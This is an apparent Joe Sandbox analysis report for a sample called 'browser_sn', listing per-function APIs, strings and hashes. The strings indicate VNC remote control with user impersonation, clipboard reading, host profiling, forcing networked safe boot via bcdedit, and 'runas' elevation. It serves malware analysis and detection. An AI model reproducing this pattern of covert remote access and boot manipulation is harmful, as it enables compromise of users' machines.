String ID: Global\$S:(ML;;NW;;;LW)$event_IN$event_IN_DONE$event_OUT$event_OUT_DONE$fm_IN$fm_OUT
API String ID: 1989023930-362996323
Opcode ID: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
Instruction ID: 7511df310327ac141a4df3adf74866b8bc3375c3c419aaa46c8f58ea32f265cb
Opcode Fuzzy Hash: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
Instruction Fuzzy Hash: DCB16B72628B8292EA64EB70A4517EAB3A1FF86750FC05131EB1D13B90DF3CE569C750

Function 00007FF790C43210 Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 133COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF790C43243
GetEnvironmentVariableA.KERNEL32 ref: 00007FF790C43265
GetPrivateProfileStringA.KERNEL32 ref: 00007FF790C432B7
GetPrivateProfileStringA.KERNEL32 ref: 00007FF790C432FF
SetFileAttributesA.KERNEL32 ref: 00007FF790C43361
WritePrivateProfileStringA.KERNEL32 ref: 00007FF790C4337D
GetLastError.KERNEL32 ref: 00007FF790C43383
GetEnvironmentVariableA.KERNEL32 ref: 00007FF790C433A1
GetForegroundWindow.USER32 ref: 00007FF790C43445
ShellExecuteExA.SHELL32 ref: 00007FF790C4347F

Strings

SYSTEMDRIVE, xrefs: 00007FF790C4325E
/boot.ini, xrefs: 00007FF790C43282
\system32\, xrefs: 00007FF790C433E1
/safeboot:network, xrefs: 00007FF790C43332
bcdedit.exe, xrefs: 00007FF790C43417
SystemRoot, xrefs: 00007FF790C43392
boot loader, xrefs: 00007FF790C4329B
runas, xrefs: 00007FF790C43453
twork, xrefs: 00007FF790C4342B
operating systems, xrefs: 00007FF790C432F0, 00007FF790C43376
default, xrefs: 00007FF790C43289

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: PrivateProfileString$EnvironmentVariable$AttributesErrorExecuteFileForegroundLastShellVersionWindowWrite
String ID: /safeboot:network$/boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$operating systems$runas$twork
API String ID: 3746257916-1709497384
Opcode ID: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
Instruction ID: 52dc10ac51dd00daf2258d930db734f2ba564bb3c1beabbf1e270d650bffb704
Opcode Fuzzy Hash: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
Instruction Fuzzy Hash: 60712E35A25A8699E764DF74E8402E9B7B0FB08368F802336EA6D427E4DF3CE155C750

Function 00007FF790C31AE0 Relevance: 36.2, APIs: 24, Instructions: 196clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF790C31B0B
IsClipboardFormatAvailable.USER32 ref: 00007FF790C31B67
GetClipboardData.USER32 ref: 00007FF790C31B79
GlobalLock.KERNEL32 ref: 00007FF790C31B8E
GlobalSize.KERNEL32 ref: 00007FF790C31B9A
WideCharToMultiByte.KERNEL32 ref: 00007FF790C31BD3
WideCharToMultiByte.KERNEL32 ref: 00007FF790C31C0D
GlobalUnlock.KERNEL32 ref: 00007FF790C31C38
IsClipboardFormatAvailable.USER32 ref: 00007FF790C31C48
GetClipboardData.USER32 ref: 00007FF790C31C58
GlobalLock.KERNEL32 ref: 00007FF790C31C69
GlobalSize.KERNEL32 ref: 00007FF790C31C75
GlobalUnlock.KERNEL32 ref: 00007FF790C31CAA

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
String ID:
API String ID: 1939172783-0
Opcode ID: b74a740e7d7a84ef91a39c9c6b0aed0404e7093e028a8cc676548e38d4108882
Instruction ID: 98432795edb0b6f800c7f44807eb00e7e91fe2601d28d6d26d391699e73630d3
Opcode Fuzzy Hash: b74a740e7d7a84ef91a39c9c6b0aed0404e7093e028a8cc676548e38d4108882
Instruction Fuzzy Hash: BF817D21A287428AEA64BF32A9141B9B3F4FF86B80B845138DE4E43795DF3CF465C314

Function 00007FF790C5C2C0 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790C5C326
LeaveCriticalSection.KERNEL32 ref: 00007FF790C5C33B
LeaveCriticalSection.KERNEL32 ref: 00007FF790C5C356

Strings

vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked, xrefs: 00007FF790C5C3A7
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error, xrefs: 00007FF790C5C43D
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call, xrefs: 00007FF790C5C2F4
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1, xrefs: 00007FF790C5C37E
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed, xrefs: 00007FF790C5C455
g, xrefs: 00007FF790C5C31B
vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s, xrefs: 00007FF790C5C3DC

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter
String ID: g$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s
API String ID: 2978645861-1267036565
Opcode ID: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
Instruction ID: 2da9a675e7c8becbae577b355a795c1c97ef1529a8ae60eae4776a11616de761
Opcode Fuzzy Hash: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
Instruction Fuzzy Hash: DD515E25A3C68288F674BB35A8546F9A3A1FF96791FC42032D94E06390DF3CF445C760

Function 00007FF790C58A70 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790CE92A4: malloc.LIBCMT ref: 00007FF790CE92C7

CreateRectRgn.GDI32 ref: 00007FF790C58BF6
CreateRectRgn.GDI32 ref: 00007FF790C58C73
SetRectRgn.GDI32 ref: 00007FF790C58C91
CombineRgn.GDI32 ref: 00007FF790C58CA8
DeleteObject.GDI32 ref: 00007FF790C58CB1
EnterCriticalSection.KERNEL32 ref: 00007FF790C58D26
CombineRgn.GDI32 ref: 00007FF790C58D42
SetEvent.KERNEL32 ref: 00007FF790C58D73
SetEvent.KERNEL32 ref: 00007FF790C58DA5
LeaveCriticalSection.KERNEL32 ref: 00007FF790C58DB7
DeleteObject.GDI32 ref: 00007FF790C58DC3
free.LIBCMT ref: 00007FF790C58CBA

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

GetRgnBox.GDI32 ref: 00007FF790C58CCC
DeleteObject.GDI32 ref: 00007FF790C58CF2
free.LIBCMT ref: 00007FF790C58CFD
free.LIBCMT ref: 00007FF790C58DCE

Strings

vncclient.cpp : FATAL! client update region is empty!, xrefs: 00007FF790C58CD7
\, xrefs: 00007FF790C58D1B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DeleteObjectRectfree$CombineCreateCriticalEventSection$EnterErrorFreeHeapLastLeave_errnomalloc
String ID: \$vncclient.cpp : FATAL! client update region is empty!
API String ID: 1264956880-3227535004
Opcode ID: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
Instruction ID: 0b0f0c9551d0ad8db58e82b3ddb0222b75474623f260b5931367eda44c96e0d1
Opcode Fuzzy Hash: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
Instruction Fuzzy Hash: B5A1D8336246968AD754EF36E444AAAB7B8FBC9B90F815035EA4D47750CF3DE805CB10

Function 00007FF790C37A5B Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF790C37C5B

Part of subcall function 00007FF790CE7C50: _errno.LIBCMT ref: 00007FF790CE7C88
Part of subcall function 00007FF790CE7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7C93

sprintf.LIBCMT ref: 00007FF790C37CC6
sprintf.LIBCMT ref: 00007FF790C37D04
sprintf.LIBCMT ref: 00007FF790C37D68
GetUserNameA.ADVAPI32 ref: 00007FF790C37E9C

Strings

IP : , xrefs: 00007FF790C37FB9
v%d., xrefs: 00007FF790C37C50
Current user : , xrefs: 00007FF790C37EA6
%02d, xrefs: 00007FF790C37CB3
, (MIPS Processor), xrefs: 00007FF790C37A6A
Service Pack: 6a, xrefs: 00007FF790C37D5D
Build:%d, xrefs: 00007FF790C37CF9
ComputerName : , xrefs: 00007FF790C37F2C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MIPS Processor)$Current user :
API String ID: 171970310-18614430
Opcode ID: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
Instruction ID: bd25e0456fe9b87d92b95df5584e4fcc4368f52a3d0c15652ad886aad30e9ae9
Opcode Fuzzy Hash: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
Instruction Fuzzy Hash: 0DB18121A2868685E774DB3598002F977A0FF05770F805376EA7E87BD5EE28F555C320

Function 00007FF790C37A1C Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF790C37C5B

Part of subcall function 00007FF790CE7C50: _errno.LIBCMT ref: 00007FF790CE7C88
Part of subcall function 00007FF790CE7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7C93

sprintf.LIBCMT ref: 00007FF790C37CC6
sprintf.LIBCMT ref: 00007FF790C37D04
sprintf.LIBCMT ref: 00007FF790C37D68
GetUserNameA.ADVAPI32 ref: 00007FF790C37E9C

Strings

, (MSIL Processor), xrefs: 00007FF790C37A2B
IP : , xrefs: 00007FF790C37FB9
v%d., xrefs: 00007FF790C37C50
Current user : , xrefs: 00007FF790C37EA6
%02d, xrefs: 00007FF790C37CB3
Service Pack: 6a, xrefs: 00007FF790C37D5D
Build:%d, xrefs: 00007FF790C37CF9
ComputerName : , xrefs: 00007FF790C37F2C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MSIL Processor)$Current user :
API String ID: 171970310-1756215141
Opcode ID: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
Instruction ID: 5268f0018bff078a0ea3e794e2b9bd0ddf4337deffec8cd8908115ffd22cfbdc
Opcode Fuzzy Hash: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
Instruction Fuzzy Hash: 68B18021A2868685E774DB3598002F977A0FF057B0F805376EA7E87BD5EE28F555C320

Function 00007FF790C37BA6 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF790C37C5B

Part of subcall function 00007FF790CE7C50: _errno.LIBCMT ref: 00007FF790CE7C88
Part of subcall function 00007FF790CE7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7C93

sprintf.LIBCMT ref: 00007FF790C37CC6
sprintf.LIBCMT ref: 00007FF790C37D04
sprintf.LIBCMT ref: 00007FF790C37D68
GetUserNameA.ADVAPI32 ref: 00007FF790C37E9C

Strings

IP : , xrefs: 00007FF790C37FB9
, (IA64 Processor), xrefs: 00007FF790C37BB5
v%d., xrefs: 00007FF790C37C50
Current user : , xrefs: 00007FF790C37EA6
%02d, xrefs: 00007FF790C37CB3
Service Pack: 6a, xrefs: 00007FF790C37D5D
Build:%d, xrefs: 00007FF790C37CF9
ComputerName : , xrefs: 00007FF790C37F2C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (IA64 Processor)$Current user :
API String ID: 171970310-1812746349
Opcode ID: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
Instruction ID: d7bba2787fea4f7953ea8df112a7759608b0f918d887dcc8d6c5d6f1f91b8d07
Opcode Fuzzy Hash: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
Instruction Fuzzy Hash: 0AB17121A2868685E774DB3598002F977A0FF05770F805376EA7E87BD5EE28F555C320

Function 00007FF790C37B37 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF790C37C5B

Part of subcall function 00007FF790CE7C50: _errno.LIBCMT ref: 00007FF790CE7C88
Part of subcall function 00007FF790CE7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7C93

sprintf.LIBCMT ref: 00007FF790C37CC6
sprintf.LIBCMT ref: 00007FF790C37D04
sprintf.LIBCMT ref: 00007FF790C37D68
GetUserNameA.ADVAPI32 ref: 00007FF790C37E9C

Strings

IP : , xrefs: 00007FF790C37FB9
v%d., xrefs: 00007FF790C37C50
Current user : , xrefs: 00007FF790C37EA6
%02d, xrefs: 00007FF790C37CB3
Service Pack: 6a, xrefs: 00007FF790C37D5D
Build:%d, xrefs: 00007FF790C37CF9
, (Alpha64 Processor), xrefs: 00007FF790C37B46
ComputerName : , xrefs: 00007FF790C37F2C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha64 Processor)$Current user :
API String ID: 171970310-1760265636
Opcode ID: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
Instruction ID: 6332867feaf16160bc42c26999df4f736eae69b951ca8f2509ce6e5ce958ec41
Opcode Fuzzy Hash: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
Instruction Fuzzy Hash: 1FB18121A2868685EB74DB3598002F9B7A0FF057B4F805336EA7D87BD5EE28F555C320

Function 00007FF790C379E9 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF790C37C5B

Part of subcall function 00007FF790CE7C50: _errno.LIBCMT ref: 00007FF790CE7C88
Part of subcall function 00007FF790CE7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7C93

sprintf.LIBCMT ref: 00007FF790C37CC6
sprintf.LIBCMT ref: 00007FF790C37D04
sprintf.LIBCMT ref: 00007FF790C37D68
GetUserNameA.ADVAPI32 ref: 00007FF790C37E9C

Strings

IP : , xrefs: 00007FF790C37FB9
v%d., xrefs: 00007FF790C37C50
Current user : , xrefs: 00007FF790C37EA6
%02d, xrefs: 00007FF790C37CB3
Service Pack: 6a, xrefs: 00007FF790C37D5D
Build:%d, xrefs: 00007FF790C37CF9
, (Intel Processor), xrefs: 00007FF790C379F8
ComputerName : , xrefs: 00007FF790C37F2C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Intel Processor)$Current user :
API String ID: 171970310-3029765189
Opcode ID: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
Instruction ID: 184523628eed31d7063da1e244d60d86e52c953b5b96454e249513b72fc98e43
Opcode Fuzzy Hash: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
Instruction Fuzzy Hash: C8B19321A2868685EB74DB3598002F977A0FF057B0F805376E67E87BD5EE28F545C320

Function 00007FF790C37B04 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF790C37C5B

Part of subcall function 00007FF790CE7C50: _errno.LIBCMT ref: 00007FF790CE7C88
Part of subcall function 00007FF790CE7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7C93

sprintf.LIBCMT ref: 00007FF790C37CC6
sprintf.LIBCMT ref: 00007FF790C37D04
sprintf.LIBCMT ref: 00007FF790C37D68
GetUserNameA.ADVAPI32 ref: 00007FF790C37E9C

Strings

IP : , xrefs: 00007FF790C37FB9
v%d., xrefs: 00007FF790C37C50
Current user : , xrefs: 00007FF790C37EA6
, (Alpha Processor), xrefs: 00007FF790C37B13
%02d, xrefs: 00007FF790C37CB3
Service Pack: 6a, xrefs: 00007FF790C37D5D
Build:%d, xrefs: 00007FF790C37CF9
ComputerName : , xrefs: 00007FF790C37F2C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
